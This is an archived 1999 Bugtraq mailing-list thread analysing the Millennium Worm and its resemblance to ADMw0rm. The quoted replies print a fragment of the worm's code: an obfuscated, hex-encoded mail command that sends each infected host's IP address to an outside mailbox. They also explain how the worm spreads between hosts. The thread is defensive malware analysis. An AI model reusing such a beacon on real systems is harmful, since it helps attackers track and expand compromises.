[11948] in bugtraq
Re: MW
daemon@ATHENA.MIT.EDU (Max Vision)
Tue Sep 21 13:57:58 1999
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Message-Id: <4.2.0.58.19990920012327.00a59c48@localhost>
Date: Mon, 20 Sep 1999 02:45:59 -0700
Reply-To: Max Vision <vision@WHITEHATS.COM>
From: Max Vision <vision@WHITEHATS.COM>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <E11ON5h-0006DQ-00@devnull.xpert.com>
Hello,
I posted two short write-ups on recent Internet worms I've seen in the wild
(ADMw0rm and Millennium Worm): http://whitehats.com/worms/. From these
previous posts it looks like someone has launched a variation of the
Millennium Worm.
Max Vision
At 05:23 PM 9/7/1999 +0200, Adam Morrison wrote:
> > On Wed, 1 Sep 1999, Christian Koderer wrote:
> > > ./IP | mail `printf
> > > "\x62\x65\x75\x72\x70\x40\x68\x6f\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d"`
> > > logout
> > > _EOF_
> >
> >
> > In case no one bothered figuring this one out, this translates to
> > 'beurp@hotmail.com'
> >
> > Apparently './IP' is a program it runs to figure out which IP it should
> > get the worm files from. Did you find a similarly named file?
>
> It's a worm; it gets the worm files from the last infected machine.
> `IP' returns the address of the machine that the copy of the worm
> is running on, and is used in the `cmd' grappling hook which
> apparently gets executed on compromised remote hosts. Each time the
> worm infects a machine, it mails the IP address of that machine to
> <beurp@hotmail.com>.
>
> Now, not to make any unfounded allegations, but this worm looks
> remarkably like ADMw0rm. I wonder why it restarts named when first
> infecting a host, when it appears to also utilize several other
> vulnerabilities in order to get in. Ho, hum.